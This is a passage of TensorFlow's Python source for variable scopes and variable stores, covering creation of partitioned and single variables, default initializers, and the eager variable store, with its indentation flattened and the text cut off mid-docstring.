# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any(p < 1 for p in partitions):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape.dims[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: Do we need to add support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
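# A minimal usage sketch for EagerVariableStore.copy(), assuming eager
# execution is enabled; the helper name below is hypothetical and for
# illustration only.
def _example_eager_store_copy():
  container = EagerVariableStore()
  with container.as_default():
    v = get_variable("v", initializer=1.0)
  snapshot = container.copy()
  v.assign_add(1.0)
  # `snapshot` holds its own copy of "v", so mutating `v` does not affect it.
  return container.variables(), snapshot.variables()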
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple custom
